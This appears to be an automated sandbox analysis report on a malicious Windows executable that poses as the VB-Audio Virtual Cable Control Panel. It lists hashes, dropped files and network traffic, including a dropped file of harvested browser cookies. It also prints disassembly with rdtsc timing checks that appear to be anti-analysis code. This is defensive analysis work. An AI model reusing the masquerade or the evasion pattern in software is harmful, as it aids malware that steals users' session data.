SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611971443428.txt Download File
Process:	C:\Users\user\AppData\Roaming\1611971443428.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	27328
Entropy (8bit):	3.7083865453338016
Encrypted:	false
SSDEEP:	384:bqg+flvIKpt3VvODNlkSOA/HkAcAKA7j8Z:bqgYlvV3ViNlkQY
MD5:	FDB1CC8DDD18105857C47E588C81374A
SHA1:	A8EC81234206778779A74C8D23AF2955FB9FFBA4
SHA-256:	A034157272D9C0BEFBF32A6466B556B94067BCF57F8C85B3C8A80A9EDAF4A266
SHA-512:	46F283211B7D216FCAC75ADD0B4187C93EDCCBE04C1878D2E6BEE7A7153DA7EF867AAEB102293A0EC284B6B88C270D90780C9AB876EA3242C0CC812A96BE3BC2
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1482039889677647
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rBuDE0k9+MlWlLehB4yAq7ejCwuDEt:OaqdmuF3riE3+kWReH4yJ7MKEt
MD5:	6D523046B7DCD40E1A30A65AAE58DE0F
SHA1:	8ACBF3844F5C3E6989E5D3E832C2BC3597775B5A
SHA-256:	AE828DE93E6C46193CCCCE0F11A881651587899F1238654B9D8234B27A3333DB
SHA-512:	5446250D47E0077090899F76E210878C39461D6B34FF398E7A2829BC3A75E65042BB8FEAD964D8EE5772C895FCD11C1A900BE58D328195254F1BA77D75593684
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 2.9. .. 2.0.2.1. .1.7.:.5.2.:.0.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 2.9. .. 2.0.2.1. .1.7.:.5.2.:.0.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.867812997543559
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Cyfj6XGbkd.exe
File size:	4247224
MD5:	63204eb716c856723a010747d58a6b00
SHA1:	7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256:	6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
SHA512:	4b00dc3d824d3526972f74b913cff2b1d0e12745de58bfe4ba6196088a17b2346b4ec019bdf923acc57c77f88aa7b17fa230100c6c35b6672c7a39bfa4953c2e
SSDEEP:	49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
File Content Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

File Icon


Icon Hash:	b595139bec4252a9

Static PE Info

General
Entrypoint:	0x403bc3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007FA684DF6E43h
mov eax, dword ptr [edx]
mov esi, esp
mov ecx, esi
push edx
call edi
mov ebx, dword ptr [ebx]
add ebx, eax
mov edx, dword ptr [edx]
mov ebx, dword ptr [ebx]
popad
popfd
push 00000005h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007FA684DF6E3Fh
pop ebx
inc edi
mov ecx, esi
mov ebx, dword ptr [esp]
mov ecx, dword ptr [ebx]
call dword ptr [eax]
mov ebp, ecx
popad
popfd
mov eax, 00403F45h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007FA684DF6E3Ch
mov ecx, dword ptr [ecx]
mov ecx, esi
mov ecx, ebp
cmp eax, edx
mov edi, ebp
popad
popfd
push eax
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007FA684DF6E41h
mov eax, dword ptr [ebp+00h]
dec eax
imul eax, edx
mov edx, dword ptr [eax]
mov ebx, dword ptr [ecx]
add eax, edx
push ecx
pop eax
popad
popfd
push 000013C5h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007FA684DF6E3Eh
mov eax, ebx
call esi
mov ecx, dword ptr [edi]
imul eax, edx
call dword ptr [ebx]
dec edx
popad
popfd
push 00000079h

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8f0	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc0590	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd2000	0x1eb8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x1c4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9276	0xa000	False	0.565625	data	6.61275809173	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x12dc	0x2000	False	0.28466796875	data	3.67874100082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x4ea4	0x4000	False	0.1611328125	data	1.88336858311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc0590	0xc1000	False	0.293020614071	data	5.94457194459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x124e0	0xbf518	data	French	France
RT_ICON	0x121e0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576	French	France
RT_MENU	0xd19f8	0x3d4	data	French	France
RT_GROUP_ICON	0x124c8	0x14	data	French	France
RT_VERSION	0xd1dd0	0x3c0	data	French	France
RT_MANIFEST	0xd2190	0x3f9	XML 1.0 document, ASCII text, with CRLF line terminators	French	France

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
USER32.dll	GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
GDI32.dll	SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
ADVAPI32.dll	RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
SHELL32.dll	ShellExecuteA
SETUPAPI.dll	SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

Version Infos

Description	Data
LegalCopyright	V.Burel2012-2015
InternalName	VBCABLE_ControlPanel
FileVersion	1, 0, 3, 5
CompanyName	VB-AUDIO Software
Comments	VB-AUDIO Control Panel forVB-Audio Virtual Cable
ProductName	VBCABLE_ControlPanel
ProductVersion	1, 0, 3, 5
FileDescription	VB-AUDIO Virtual Cable Control Panel
OriginalFilename	VBCABLE_ControlPanel.exe
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	France

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:50:33.636482954 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.685533047 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.685646057 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.686583996 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.686661959 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.735821962 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.735841990 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749600887 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749638081 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749665976 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749689102 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749703884 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.749747992 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.749823093 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.773344040 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.774244070 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.820198059 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.820231915 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824717999 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824767113 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824799061 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824847937 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824877977 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.824878931 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:33.824928045 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:33.867115974 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:34.017721891 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:34.017786980 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:34.065176010 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.065207958 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.070956945 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.070993900 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.071101904 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:34.071530104 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.071563959 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.071692944 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:34.073491096 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:34.117127895 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:36.319972992 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:36.320050955 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:36.366226912 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.372354031 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.372390032 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.372522116 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:36.375153065 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.375211954 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.375346899 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:36.375693083 CET	80	49714	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:36.445493937 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.468389988 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.515734911 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.515872002 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.533689022 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.533715963 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.581190109 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.581207991 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595381021 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595415115 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595434904 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595458984 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595474005 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:42.595501900 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.595535994 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.649208069 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:42.983823061 CET	49714	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.801558971 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.847400904 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.847512007 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.850296021 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.850317001 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.896234989 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.896259069 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.917998075 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.918021917 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.918040037 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.918055058 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.918067932 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:43.918189049 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:43.918215036 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:46.055474997 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:46.055578947 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:46.102329969 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.102355957 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.111821890 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.111848116 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.111944914 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:46.111970901 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.111988068 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.112006903 CET	80	49716	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:46.112056971 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:50.820269108 CET	49716	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:53.770232916 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:53.770311117 CET	49715	80	192.168.2.3	104.21.23.16
Jan 29, 2021 17:50:53.815972090 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.815993071 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.843482018 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.843506098 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.843522072 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.843537092 CET	80	49715	104.21.23.16	192.168.2.3
Jan 29, 2021 17:50:53.843547106 CET	80	49715	104.21.23.16	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 29, 2021 17:50:22.443387985 CET	65110	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:22.493549109 CET	53	65110	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:25.104649067 CET	58361	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:25.152906895 CET	53	58361	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:26.418684006 CET	63492	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:26.469404936 CET	53	63492	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:27.470911980 CET	60831	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:27.520756960 CET	53	60831	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:28.608078003 CET	60100	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:28.667613983 CET	53	60100	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:29.801359892 CET	53195	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:29.851906061 CET	53	53195	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:31.387161970 CET	50141	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:31.439678907 CET	53	50141	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:33.568248987 CET	53023	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:33.624427080 CET	53	53023	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:42.404350042 CET	49563	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:42.452200890 CET	53	49563	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:43.736141920 CET	51352	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:43.792432070 CET	53	51352	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:49.058208942 CET	59349	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:49.118997097 CET	53	59349	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:53.950866938 CET	57084	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:53.998780966 CET	53	57084	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:55.260693073 CET	58823	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:55.311316967 CET	53	58823	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:56.908438921 CET	57568	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:56.956259012 CET	53	57568	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:58.225905895 CET	50540	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:58.276961088 CET	53	50540	8.8.8.8	192.168.2.3
Jan 29, 2021 17:50:59.404422045 CET	54366	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:50:59.452399969 CET	53	54366	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:00.543997049 CET	53034	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:00.594655037 CET	53	53034	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:00.987274885 CET	57762	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:01.065690041 CET	53	57762	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:10.892122030 CET	55435	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:10.939943075 CET	53	55435	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:13.882599115 CET	50713	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:13.939924955 CET	53	50713	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:18.288214922 CET	56132	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:18.346786022 CET	53	56132	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:29.631877899 CET	58987	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:29.701486111 CET	53	58987	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:39.711781979 CET	56579	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:39.759952068 CET	53	56579	8.8.8.8	192.168.2.3
Jan 29, 2021 17:51:44.089724064 CET	60633	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:51:44.149126053 CET	53	60633	8.8.8.8	192.168.2.3
Jan 29, 2021 17:52:13.943475962 CET	61292	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:52:13.991473913 CET	53	61292	8.8.8.8	192.168.2.3
Jan 29, 2021 17:52:14.626868963 CET	63619	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:52:14.692096949 CET	53	63619	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:03.678997040 CET	64938	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:03.767121077 CET	53	64938	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:04.244833946 CET	61946	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:04.308696985 CET	53	61946	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:04.802845001 CET	64910	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:04.861808062 CET	53	64910	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:05.358664989 CET	52123	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:05.420514107 CET	53	52123	8.8.8.8	192.168.2.3
Jan 29, 2021 17:53:05.806607008 CET	56130	53	192.168.2.3	8.8.8.8
Jan 29, 2021 17:53:05.865626097 CET	53	56130	8.8.8.8	192.168.2.3
